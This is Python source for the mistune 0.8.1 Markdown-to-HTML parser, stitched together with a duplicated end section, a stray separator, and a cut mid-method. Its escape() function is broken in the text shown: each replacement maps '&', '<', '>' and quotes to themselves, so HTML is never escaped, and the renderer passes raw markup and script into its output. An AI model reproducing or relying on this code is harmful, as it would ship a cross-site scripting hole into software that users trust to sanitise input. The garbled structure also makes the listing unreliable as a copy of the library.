for i, v in enumerate(cells):
cells[i] = re.split(r' *\| *', v)
item['cells'] = cells
self.tokens.append(item)
def _process_table(self, m):
header = re.sub(r'^ *| *\| *$', '', m.group(1))
header = re.split(r' *\| *', header)
align = re.sub(r' *|\| *$', '', m.group(2))
align = re.split(r' *\| *', align)
for i, v in enumerate(align):
if re.search(r'^ *-+: *$', v):
align[i] = 'right'
elif re.search(r'^ *:-+: *$', v):
align[i] = 'center'
elif re.search(r'^ *:-+ *$', v):
align[i] = 'left'
else:
align[i] = None
item = {
'type': 'table',
'header': header,
'align': align,
}
return item
def parse_block_html(self, m):
tag = m.group(1)
if not tag:
text = m.group(0)
self.tokens.append({
'type': 'close_html',
'text': text
})
else:
attr = m.group(2)
text = m.group(3)
self.tokens.append({
'type': 'open_html',
'tag': tag,
'extra': attr,
'text': text
})
def parse_paragraph(self, m):
text = m.group(1).rstrip('\n')
self.tokens.append({'type': 'paragraph', 'text': text})
def parse_text(self, m):
text = m.group(0)
self.tokens.append({'type': 'text', 'text': text})
class InlineGrammar(object):
"""Grammars for inline level tokens."""
escape = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])') # \* \+ \! ....
inline_html = re.compile(
r'^(?:%s|%s|%s)' % (
r'<!--[\s\S]*?-->',
r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (_valid_end, _valid_attr),
r'<\w+%s(?:%s)*?\s*\/?>' % (_valid_end, _valid_attr),
)
)
autolink = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
link = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\('
r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
r'\)'
)
reflink = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\s*\[([^^\]]*)\]'
)
nolink = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
url = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
double_emphasis = re.compile(
r'^_{2}([\s\S]+?)_{2}(?!_)' # __word__
r'|'
r'^\*{2}([\s\S]+?)\*{2}(?!\*)' # **word**
)
emphasis = re.compile(
r'^\b_((?:__|[^_])+?)_\b' # _word_
r'|'
r'^\*((?:\*\*|[^\*])+?)\*(?!\*)' # *word*
)
code = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)') # `code`
linebreak = re.compile(r'^ {2,}\n(?!\s*$)')
strikethrough = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~') # ~~word~~
footnote = re.compile(r'^\[\^([^\]]+)\]')
text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')
def hard_wrap(self):
"""Grammar for hard wrap linebreak. You don't need to add two
spaces at the end of a line.
"""
self.linebreak = re.compile(r'^ *\n(?!\s*$)')
self.text = re.compile(
r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
)
class InlineLexer(object):
"""Inline level lexer for inline grammars."""
grammar_class = InlineGrammar
default_rules = [
'escape', 'inline_html', 'autolink', 'url',
'footnote', 'link', 'reflink', 'nolink',
'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
inline_html_rules = [
'escape', 'autolink', 'url', 'link', 'reflink',
'nolink', 'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
def __init__(self, renderer, rules=None, **kwargs):
self.renderer = renderer
self.links = {}
self.footnotes = {}
self.footnote_index = 0
if not rules:
rules = self.grammar_class()
kwargs.update(self.renderer.options)
if kwargs.get('hard_wrap'):
rules.hard_wrap()
self.rules = rules
self._in_link = False
self._in_footnote = False
self._parse_inline_html = kwargs.get('parse_inline_html')
def __call__(self, text, rules=None):
return self.output(text, rules)
def setup(self, links, footnotes):
self.footnote_index = 0
self.links = links or {}
self.footnotes = footnotes or {}
def output(self, text, rules=None):
text = text.rstrip('\n')
if not rules:
rules = list(self.default_rules)
if self._in_footnote and 'footnote' in rules:
rules.remove('footnote')
output = self.renderer.placeholder()
def manipulate(text):
for key in rules:
pattern = getattr(self.rules, key)
m = pattern.match(text)
if not m:
continue
self.line_match = m
out = getattr(self, 'output_%s' % key)(m)
if out is not None:
return m, out
return False # pragma: no cover
while text:
ret = manipulate(text)
if ret is not False:
m, out = ret
output += out
text = text[len(m.group(0)):]
continue
if text: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % text)
return output
def output_escape(self, m):
text = m.group(1)
return self.renderer.escape(text)
def output_autolink(self, m):
link = m.group(1)
if m.group(2) == '@':
is_email = True
else:
is_email = False
return self.renderer.autolink(link, is_email)
def output_url(self, m):
link = m.group(1)
if self._in_link:
return self.renderer.text(link)
return self.renderer.autolink(link, False)
def output_inline_html(self, m):
tag = m.group(1)
if self._parse_inline_html and tag in _inline_tags:
text = m.group(3)
if tag == 'a':
self._in_link = True
text = self.output(text, rules=self.inline_html_rules)
self._in_link = False
else:
text = self.output(text, rules=self.inline_html_rules)
extra = m.group(2) or ''
html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
else:
html = m.group(0)
return self.renderer.inline_html(html)
def output_footnote(self, m):
key = _keyify(m.group(1))
if key not in self.footnotes:
return None
if self.footnotes[key]:
return None
self.footnote_index += 1
self.footnotes[key] = self.footnote_index
return self.renderer.footnote_ref(key, self.footnote_index)
def output_link(self, m):
return self._process_link(m, m.group(3), m.group(4))
def output_reflink(self, m):
key = _keyify(m.group(2) or m.group(1))
if key not in self.links:
return None
ret = self.links[key]
return self._process_link(m, ret['link'], ret['title'])
def output_nolink(self, m):
key = _keyify(m.group(1))
if key not in self.links:
return None
ret = self.links[key]
return self._process_link(m, ret['link'], ret['title'])
def _process_link(self, m, link, title=None):
line = m.group(0)
text = m.group(1)
if line[0] == '!':
return self.renderer.image(link, title, text)
self._in_link = True
text = self.output(text)
self._in_link = False
return self.renderer.link(link, title, text)
def output_double_emphasis(self, m):
text = m.group(2) or m.group(1)
text = self.output(text)
return self.renderer.double_emphasis(text)
def output_emphasis(self, m):
text = m.group(2) or m.group(1)
text = self.output(text)
return self.renderer.emphasis(text)
def output_code(self, m):
text = m.group(2)
return self.renderer.codespan(text)
def output_linebreak(self, m):
return self.renderer.linebreak()
def output_strikethrough(self, m):
text = self.output(m.group(1))
return self.renderer.strikethrough(text)
def output_text(self, m):
text = m.group(0)
return self.renderer.text(text)
class Renderer(object):
"""The default HTML renderer for rendering Markdown.
"""
def __init__(self, **kwargs):
self.options = kwargs
def placeholder(self):
"""Returns the default, empty output value for the renderer.
All renderer methods use the '+=' operator to append to this value.
Default is a string so rendering HTML can build up a result string with
the rendered Markdown.
Can be overridden by Renderer subclasses to be types like an empty
list, allowing the renderer to create a tree-like structure to
represent the document (which can then be reprocessed later into a
separate format like docx or pdf).
"""
return ''
def block_code(self, code, lang=None):
"""Rendering block level code. ``pre > code``.
:param code: text content of the code block.
:param lang: language of the given code.
"""
code = code.rstrip('\n')
if not lang:
code = escape(code, smart_amp=False)
return '<pre><code>%s\n</code></pre>\n' % code
code = escape(code, quote=True, smart_amp=False)
return '<pre><code class="lang-%s">%s\n</code></pre>\n' % (lang, code)
def block_quote(self, text):
"""Rendering <blockquote> with the given text.
:param text: text content of the blockquote.
"""
return '<blockquote>%s\n</blockquote>\n' % text.rstrip('\n')
def block_html(self, html):
"""Rendering block level pure html content.
:param html: text content of the html snippet.
"""
if self.options.get('skip_style') and \
html.lower().startswith('<style'):
return ''
if self.options.get('escape'):
return escape(html)
return html
def header(self, text, level, raw=None):
"""Rendering header/heading tags like ``<h1>`` ``<h2>``.
:param text: rendered text content for the header.
:param level: a number for the header level, for example: 1.
:param raw: raw text content of the header.
"""
return '<h%d>%s</h%d>\n' % (level, text, level)
def hrule(self):
"""Rendering method for ``<hr>`` tag."""
if self.options.get('use_xhtml'):
return '<hr />\n'
return '<hr>\n'
def list(self, body, ordered=True):
"""Rendering list tags like ``<ul>`` and ``<ol>``.
:param body: body contents of the list.
:param ordered: whether this list is ordered or not.
"""
tag = 'ul'
if ordered:
tag = 'ol'
return '<%s>\n%s</%s>\n' % (tag, body, tag)
def list_item(self, text):
"""Rendering list item snippet. Like ``<li>``."""
return '<li>%s</li>\n' % text
def paragraph(self, text):
"""Rendering paragraph tags. Like ``<p>``."""
return '<p>%s</p>\n' % text.strip(' ')
def table(self, header, body):
"""Rendering table element. Wrap header and body in it.
:param header: header part of the table.
:param body: body part of the table.
"""
return (
'<table>\n<thead>%s</thead>\n'
'<tbody>\n%s</tbody>\n</table>\n'
) % (header, body)
def table_row(self, content):
"""Rendering a table row. Like ``<tr>``.
:param content: content of current table row.
"""
return '<tr>\n%s</tr>\n' % content
def table_cell(self, content, **flags):
"""Rendering a table cell. Like ``<th>`` ``<td>``.
:param content: content of current table cell.
:param header: whether this is header or not.
:param align: align of current table cell.
"""
if flags['header']:
tag = 'th'
else:
tag = 'td'
align = flags['align']
if not align:
return '<%s>%s</%s>\n' % (tag, content, tag)
return '<%s style="text-align:%s">%s</%s>\n' % (
tag, align, content, tag
)
def double_emphasis(self, text):
"""Rendering **strong** text.
:param text: text content for emphasis.
"""
return '<strong>%s</strong>' % text
def emphasis(self, text):
"""Rendering *emphasis* text.
:param text: text content for emphasis.
"""
return '<em>%s</em>' % text
def codespan(self, text):
"""Rendering inline `code` text.
:param text: text content for inline code.
"""
text = escape(text.rstrip(), smart_amp=False)
return '<code>%s</code>' % text
def linebreak(self):
"""Rendering line break like ``<br>``."""
if self.options.get('use_xhtml'):
return '<br />\n'
return '<br>\n'
def strikethrough(self, text):
"""Rendering ~~strikethrough~~ text.
:param text: text content for strikethrough.
"""
return '<del>%s</del>' % text
def text(self, text):
"""Rendering unformatted text.
:param text: text content.
"""
if self.options.get('parse_block_html'):
return text
return escape(text)
def escape(self, text):
"""Rendering escape sequence.
:param text: text content.
"""
return escape(text)
def autolink(self, link, is_email=False):
"""Rendering a given link or email address.
:param link: link content or email address.
:param is_email: whether this is an email or not.
"""
text = link = escape_link(link)
if is_email:
link = 'mailto:%s' % link
return '<a href="%s">%s</a>' % (link, text)
def link(self, link, title, text):
"""Rendering a given link with content and title.
:param link: href link for ``<a>`` tag.
:param title: title content for `title` attribute.
:param text: text content for description.
"""
link = escape_link(link)
if not title:
return '<a href="%s">%s</a>' % (link, text)
title = escape(title, quote=True)
return '<a href="%s" title="%s">%s</a>' % (link, title, text)
def image(self, src, title, text):
"""Rendering a image with title and text.
:param src: source link of the image.
:param title: title text of the image.
:param text: alt text of the image.
"""
src = escape_link(src)
text = escape(text, quote=True)
if title:
title = escape(title, quote=True)
html = '<img src="%s" alt="%s" title="%s"' % (src, text, title)
else:
html = '<img src="%s" alt="%s"' % (src, text)
if self.options.get('use_xhtml'):
return '%s />' % html
return '%s>' % html
def inline_html(self, html):
"""Rendering span level pure html content.
:param html: text content of the html snippet.
"""
if self.options.get('escape'):
return escape(html)
return html
def newline(self):
"""Rendering newline element."""
return ''
def footnote_ref(self, key, index):
"""Rendering the ref anchor of a footnote.
:param key: identity key for the footnote.
:param index: the index count of current footnote.
"""
html = (
'<sup class="footnote-ref" id="fnref-%s">'
'<a href="#fn-%s">%d</a></sup>'
) % (escape(key), escape(key), index)
return html
def footnote_item(self, key, text):
"""Rendering a footnote item.
:param key: identity key for the footnote.
:param text: text content of the footnote.
"""
back = (
'<a href="#fnref-%s" class="footnote">↩</a>'
) % escape(key)
text = text.rstrip()
if text.endswith('</p>'):
text = re.sub(r'<\/p>$', r'%s</p>' % back, text)
else:
text = '%s<p>%s</p>' % (text, back)
html = '<li id="fn-%s">%s</li>\n' % (escape(key), text)
return html
def footnotes(self, text):
"""Wrapper for all footnotes.
:param text: contents of all footnotes.
"""
html = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
return html % (self.hrule(), text)
class Markdown(object):
"""The Markdown parser.
:param renderer: An instance of ``Renderer``.
:param inline: An inline lexer class or instance.
:param block: A block lexer class or instance.
"""
def __init__(self, renderer=None, inline=None, block=None, **kwargs):
if not renderer:
renderer = Renderer(**kwargs)
else:
kwargs.update(renderer.options)
self.renderer = renderer
if inline and inspect.isclass(inline):
inline = inline(renderer, **kwargs)
if block and inspect.isclass(block):
block = block(**kwargs)
if inline:
self.inline = inline
else:
self.inline = InlineLexer(renderer, **kwargs)
self.block = block or BlockLexer(BlockGrammar())
self.footnotes = []
self.tokens = []
# detect if it should parse text in block html
self._parse_block_html = kwargs.get('parse_block_html')
def __call__(self, text):
return self.parse(text)
def render(self, text):
"""Render the Markdown text.
:param text: markdown formatted text content.
"""
return self.parse(text)
def parse(self, text):
out = self.output(preprocessing(text))
keys = self.block.def_footnotes
# reset block
self.block.def_links = {}
self.block.def_footnotes = {}
# reset inline
self.inline.links = {}
self.inline.footnotes = {}
if not self.footnotes:
return out
footnotes = filter(lambda o: keys.get(o['key']), self.footnotes)
self.footnotes = sorted(
footnotes, key=lambda o: keys.get(o['key']), reverse=True
)
body = self.renderer.placeholder()
while self.footnotes:
note = self.footnotes.pop()
body += self.renderer.footnote_item(
note['key'], note['text']
)
out += self.renderer.footnotes(body)
return out
def pop(self):
if not self.tokens:
return None
self.token = self.tokens.pop()
return self.token
def peek(self):
if self.tokens:
return self.tokens[-1]
return None # pragma: no cover
def output(self, text, rules=None):
self.tokens = self.block(text, rules)
self.tokens.reverse()
self.inline.setup(self.block.def_links, self.block.def_footnotes)
out = self.renderer.placeholder()
while self.pop():
out += self.tok()
return out
def tok(self):
t = self.token['type']
# sepcial cases
if t.endswith('_start'):
t = t[:-6]
return getattr(self, 'output_%s' % t)()
def tok_text(self):
text = self.token['text']
while self.peek()['type'] == 'text':
text += '\n' + self.pop()['text']
return self.inline(text)
def output_newline(self):
return self.renderer.newline()
def output_hrule(self):
return self.renderer.hrule()
def output_heading(self):
return self.renderer.header(
self.inline(self.token['text']),
self.token['level'],
self.token['text'],
)
def output_code(self):
return self.renderer.block_code(
self.token['text'], self.token['lang']
)
def output_table(self):
aligns = self.token['align']
aligns_length = len(aligns)
cell = self.renderer.placeholder()
# header part
header = self.renderer.placeholder()
for i, value in enumerate(self.token['header']):
align = aligns[i] if i < aligns_length else None
flags = {'header': True, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
header += self.renderer.table_row(cell)
# body part
body = self.renderer.placeholder()
for i, row in enumerate(self.token['cells']):
cell = self.renderer.placeholder()
for j, value in enumerate(row):
align = aligns[j] if j < aligns_length else None
flags = {'header': False, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
body += self.renderer.table_row(cell)
return self.renderer.table(header, body)
def output_block_quote(self):
body = self.renderer.placeholder()
while self.pop()['type'] != 'block_quote_end':
body += self.tok()
return self.renderer.block_quote(body)
def output_list(self):
ordered = self.token['ordered']
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
body += self.tok()
return self.renderer.list(body, ordered)
def output_list_item(self):
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
if self.token['type'] == 'text':
body += self.tok_text()
else:
body += self.tok()
return self.renderer.list_item(body)
def output_loose_item(self):
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
body += self.tok()
return self.renderer.list_item(body)
def output_footnote(self):
self.inline._in_footnote = True
body = self.renderer.placeholder()
key = self.token['key']
while self.pop()['type'] != 'footnote_end':
body += self.tok()
self.footnotes.append({'key': key, 'text': body})
self.inline._in_footnote = False
return self.renderer.placeholder()
def output_close_html(self):
text = self.token['text']
return self.renderer.block_html(text)
def output_open_html(self):
text = self.token['text']
tag = self.token['tag']
if self._parse_block_html and tag not in _pre_tags:
text = self.inline(text, rules=self.inline.inline_html_rules)
extra = self.token.get('extra') or ''
html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
return self.renderer.block_html(html)
def output_paragraph(self):
return self.renderer.paragraph(self.inline(self.token['text']))
def output_text(self):
return self.renderer.paragraph(self.tok_text())
def markdown(text, escape=True, **kwargs):
"""Render markdown formatted text to html.
:param text: markdown formatted text content.
:param escape: if set to False, all html tags will not be escaped.
:param use_xhtml: output with xhtml tags.
:param hard_wrap: if set to True, it will use the GFM line breaks feature.
:param parse_block_html: parse text only in block level html.
:param parse_inline_html: parse text only in inline level html.
"""
return Markdown(escape=escape, **kwargs)(text)
| # coding: utf-8
"""
mistune
~~~~~~~
The fastest markdown parser in pure Python with renderer feature.
:copyright: (c) 2014 - 2017 by Hsiaoming Yang.
"""
import re
import inspect
__version__ = '0.8.1'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
'BlockGrammar', 'BlockLexer',
'InlineGrammar', 'InlineLexer',
'Renderer', 'Markdown',
'markdown', 'escape',
]
_key_pattern = re.compile(r'\s+')
_nonalpha_pattern = re.compile(r'\W')
_escape_pattern = re.compile(r'&(?!#?\w+;)')
_newline_pattern = re.compile(r'\r\n|\r')
_block_quote_leading_pattern = re.compile(r'^ *> ?', flags=re.M)
_block_code_leading_pattern = re.compile(r'^ {4}', re.M)
_inline_tags = [
'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
'img', 'font',
]
_pre_tags = ['pre', 'script', 'style']
_valid_end = r'(?!:/|[^\w\s@]*@)\b'
_valid_attr = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|[^\s'">]+))?'''
_block_tag = r'(?!(?:%s)\b)\w+%s' % ('|'.join(_inline_tags), _valid_end)
_scheme_blacklist = ('javascript:', 'vbscript:')
def _pure_pattern(regex):
pattern = regex.pattern
if pattern.startswith('^'):
pattern = pattern[1:]
return pattern
def _keyify(key):
key = escape(key.lower(), quote=True)
return _key_pattern.sub(' ', key)
def escape(text, quote=False, smart_amp=True):
"""Replace special characters "&", "<" and ">" to HTML-safe sequences.
The original cgi.escape will always escape "&", but you can control
this one for a smart escape amp.
:param quote: if set to True, " and ' will be escaped.
:param smart_amp: if set to False, & will always be escaped.
"""
if smart_amp:
text = _escape_pattern.sub('&', text)
else:
text = text.replace('&', '&')
text = text.replace('<', '<')
text = text.replace('>', '>')
if quote:
text = text.replace('"', '"')
text = text.replace("'", ''')
return text
def escape_link(url):
"""Remove dangerous URL schemes like javascript: and escape afterwards."""
lower_url = url.lower().strip('\x00\x1a \n\r\t')
for scheme in _scheme_blacklist:
if re.sub(r'[^A-Za-z0-9\/:]+', '', lower_url).startswith(scheme):
return ''
return escape(url, quote=True, smart_amp=False)
def preprocessing(text, tab=4):
text = _newline_pattern.sub('\n', text)
text = text.expandtabs(tab)
text = text.replace('\u2424', '\n')
pattern = re.compile(r'^ +$', re.M)
return pattern.sub('', text)
class BlockGrammar(object):
"""Grammars for block level tokens."""
def_links = re.compile(
r'^ *\[([^^\]]+)\]: *' # [key]:
r'<?([^\s>]+)>?' # <link> or link
r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
)
def_footnotes = re.compile(
r'^\[\^([^\]]+)\]: *('
r'[^\n]*(?:\n+|$)' # [^key]:
r'(?: {1,}[^\n]*(?:\n+|$))*'
r')'
)
newline = re.compile(r'^\n+')
block_code = re.compile(r'^( {4}[^\n]+\n*)+')
fences = re.compile(
r'^ *(`{3,}|~{3,}) *(\S+)? *\n' # ```lang
r'([\s\S]+?)\s*'
r'\1 *(?:\n+|$)' # ```
)
hrule = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
heading = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
lheading = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
block_quote = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
list_block = re.compile(
r'^( *)([*+-]|\d+\.) [\s\S]+?'
r'(?:'
r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))' # hrule
r'|\n+(?=%s)' # def links
r'|\n+(?=%s)' # def footnotes
r'|\n{2,}'
r'(?! )'
r'(?!\1(?:[*+-]|\d+\.) )\n*'
r'|'
r'\s*$)' % (
_pure_pattern(def_links),
_pure_pattern(def_footnotes),
)
)
list_item = re.compile(
r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
flags=re.M
)
list_bullet = re.compile(r'^ *(?:[*+-]|\d+\.) +')
paragraph = re.compile(
r'^((?:[^\n]+\n?(?!'
r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
r'))+)\n*' % (
_pure_pattern(fences).replace(r'\1', r'\2'),
_pure_pattern(list_block).replace(r'\1', r'\3'),
_pure_pattern(hrule),
_pure_pattern(heading),
_pure_pattern(lheading),
_pure_pattern(block_quote),
_pure_pattern(def_links),
_pure_pattern(def_footnotes),
'<' + _block_tag,
)
)
block_html = re.compile(
r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
r'<!--[\s\S]*?-->',
r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (_block_tag, _valid_attr),
r'<%s(?:%s)*?\s*\/?>' % (_block_tag, _valid_attr),
)
)
table = re.compile(
r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
)
nptable = re.compile(
r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
)
text = re.compile(r'^[^\n]+')
class BlockLexer(object):
"""Block level lexer for block grammars."""
grammar_class = BlockGrammar
default_rules = [
'newline', 'hrule', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'block_quote',
'list_block', 'block_html', 'def_links',
'def_footnotes', 'table', 'paragraph', 'text'
]
list_rules = (
'newline', 'block_code', 'fences', 'lheading', 'hrule',
'block_quote', 'list_block', 'block_html', 'text',
)
footnote_rules = (
'newline', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'hrule', 'block_quote',
'list_block', 'block_html', 'table', 'paragraph', 'text'
)
def __init__(self, rules=None, **kwargs):
self.tokens = []
self.def_links = {}
self.def_footnotes = {}
if not rules:
rules = self.grammar_class()
self.rules = rules
def __call__(self, text, rules=None):
return self.parse(text, rules)
def parse(self, text, rules=None):
text = text.rstrip('\n')
if not rules:
rules = self.default_rules
def manipulate(text):
for key in rules:
rule = getattr(self.rules, key)
m = rule.match(text)
if not m:
continue
getattr(self, 'parse_%s' % key)(m)
return m
return False # pragma: no cover
while text:
m = manipulate(text)
if m is not False:
text = text[len(m.group(0)):]
continue
if text: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % text)
return self.tokens
def parse_newline(self, m):
length = len(m.group(0))
if length > 1:
self.tokens.append({'type': 'newline'})
def parse_block_code(self, m):
# clean leading whitespace
code = _block_code_leading_pattern.sub('', m.group(0))
self.tokens.append({
'type': 'code',
'lang': None,
'text': code,
})
def parse_fences(self, m):
self.tokens.append({
'type': 'code',
'lang': m.group(2),
'text': m.group(3),
})
def parse_heading(self, m):
self.tokens.append({
'type': 'heading',
'level': len(m.group(1)),
'text': m.group(2),
})
def parse_lheading(self, m):
"""Parse setext heading."""
self.tokens.append({
'type': 'heading',
'level': 1 if m.group(2) == '=' else 2,
'text': m.group(1),
})
def parse_hrule(self, m):
self.tokens.append({'type': 'hrule'})
def parse_list_block(self, m):
bull = m.group(2)
self.tokens.append({
'type': 'list_start',
'ordered': '.' in bull,
})
cap = m.group(0)
self._process_list_item(cap, bull)
self.tokens.append({'type': 'list_end'})
def _process_list_item(self, cap, bull):
cap = self.rules.list_item.findall(cap)
_next = False
length = len(cap)
for i in range(length):
item = cap[i][0]
# remove the bullet
space = len(item)
item = self.rules.list_bullet.sub('', item)
# outdent
if '\n ' in item:
space = space - len(item)
pattern = re.compile(r'^ {1,%d}' % space, flags=re.M)
item = pattern.sub('', item)
# determine whether item is loose or not
loose = _next
if not loose and re.search(r'\n\n(?!\s*$)', item):
loose = True
rest = len(item)
if i != length - 1 and rest:
_next = item[rest-1] == '\n'
if not loose:
loose = _next
if loose:
t = 'loose_item_start'
else:
t = 'list_item_start'
self.tokens.append({'type': t})
# recurse
self.parse(item, self.list_rules)
self.tokens.append({'type': 'list_item_end'})
def parse_block_quote(self, m):
self.tokens.append({'type': 'block_quote_start'})
# clean leading >
cap = _block_quote_leading_pattern.sub('', m.group(0))
self.parse(cap)
self.tokens.append({'type': 'block_quote_end'})
def parse_def_links(self, m):
key = _keyify(m.group(1))
self.def_links[key] = {
'link': m.group(2),
'title': m.group(3),
}
def parse_def_footnotes(self, m):
key = _keyify(m.group(1))
if key in self.def_footnotes:
# footnote is already defined
return
self.def_footnotes[key] = 0
self.tokens.append({
'type': 'footnote_start',
'key': key,
})
text = m.group(2)
if '\n' in text:
lines = text.split('\n')
whitespace = None
for line in lines[1:]:
space = len(line) - len(line.lstrip())
if space and (not whitespace or space < whitespace):
whitespace = space
newlines = [lines[0]]
for line in lines[1:]:
newlines.append(line[whitespace:])
text = '\n'.join(newlines)
self.parse(text, self.footnote_rules)
self.tokens.append({
'type': 'footnote_end',
'key': key,
})
def parse_table(self, m):
item = self._process_table(m)
cells = re.sub(r'(?: *\| *)?\n$', '', m.group(3))
cells = cells.split('\n')
for i, v in enumerate(cells):
v = re.sub(r'^ *\| *| *\| *$', '', v)
cells[i] = re.split(r' *\| *', v)
item['cells'] = cells
self.tokens.append(item)
def parse_nptable(self, m):
item = self._process_table(m)
cells = re.sub(r'\n$', '', m.group(3))
cells = cells.split('\n')
for i, v in enumerate(cells):
cells[i] = re.split(r' *\| *', v)
item['cells'] = cells
self.tokens.append(item)
def _process_table(self, m):
header = re.sub(r'^ *| *\| *$', '', m.group(1))
header = re.split(r' *\| *', header)
align = re.sub(r' *|\| *$', '', m.group(2))
align = re.split(r' *\| *', align)
for i, v in enumerate(align):
if re.search(r'^ *-+: *$', v):
align[i] = 'right'
elif re.search(r'^ *:-+: *$', v):
align[i] = 'center'
elif re.search(r'^ *:-+ *$', v):
align[i] = 'left'
else:
align[i] = None
item = {
'type': 'table',
'header': header,
'align': align,
}
return item
def parse_block_html(self, m):
tag = m.group(1)
if not tag:
text = m.group(0)
self.tokens.append({
'type': 'close_html',
'text': text
})
else:
attr = m.group(2)
text = m.group(3)
self.tokens.append({
'type': 'open_html',
'tag': tag,
'extra': attr,
'text': text
})
def parse_paragraph(self, m):
text = m.group(1).rstrip('\n')
self.tokens.append({'type': 'paragraph', 'text': text})
def parse_text(self, m):
text = m.group(0)
self.tokens.append({'type': 'text', 'text': text})
class InlineGrammar(object):
"""Grammars for inline level tokens."""
escape = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])') # \* \+ \! ....
inline_html = re.compile(
r'^(?:%s|%s|%s)' % (
r'<!--[\s\S]*?-->',
r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (
_valid_end, _valid_attr),
r'<\w+%s(?:%s)*?\s*\/?>' % (_valid_end, _valid_attr),
)
)
autolink = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
link = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\('
r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
r'\)'
)
reflink = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\s*\[([^^\]]*)\]'
)
nolink = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
url = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
double_emphasis = re.compile(
r'^_{2}([\s\S]+?)_{2}(?!_)' # __word__
r'|'
r'^\*{2}([\s\S]+?)\*{2}(?!\*)' # **word**
)
emphasis = re.compile(
r'^\b_((?:__|[^_])+?)_\b' # _word_
r'|'
r'^\*((?:\*\*|[^\*])+?)\*(?!\*)' # *word*
)
code = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)') # `code`
linebreak = re.compile(r'^ {2,}\n(?!\s*$)')
strikethrough = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~') # ~~word~~
footnote = re.compile(r'^\[\^([^\]]+)\]')
text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')
def hard_wrap(self):
"""Grammar for hard wrap linebreak. You don't need to add two
spaces at the end of a line.
"""
self.linebreak = re.compile(r'^ *\n(?!\s*$)')
self.text = re.compile(
r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
)
class InlineLexer(object):
"""Inline level lexer for inline grammars."""
grammar_class = InlineGrammar
default_rules = [
'escape', 'inline_html', 'autolink', 'url',
'footnote', 'link', 'reflink', 'nolink',
'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
inline_html_rules = [
'escape', 'autolink', 'url', 'link', 'reflink',
'nolink', 'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
def __init__(self, renderer, rules=None, **kwargs):
self.renderer = renderer
self.links = {}
self.footnotes = {}
self.footnote_index = 0
if not rules:
rules = self.grammar_class()
kwargs.update(self.renderer.options)
if kwargs.get('hard_wrap'):
rules.hard_wrap()
self.rules = rules
self._in_link = False
self._in_footnote = False
self._parse_inline_html = kwargs.get('parse_inline_html')
def __call__(self, text, rules=None):
return self.output(text, rules)
def setup(self, links, footnotes):
self.footnote_index = 0
self.links = links or {}
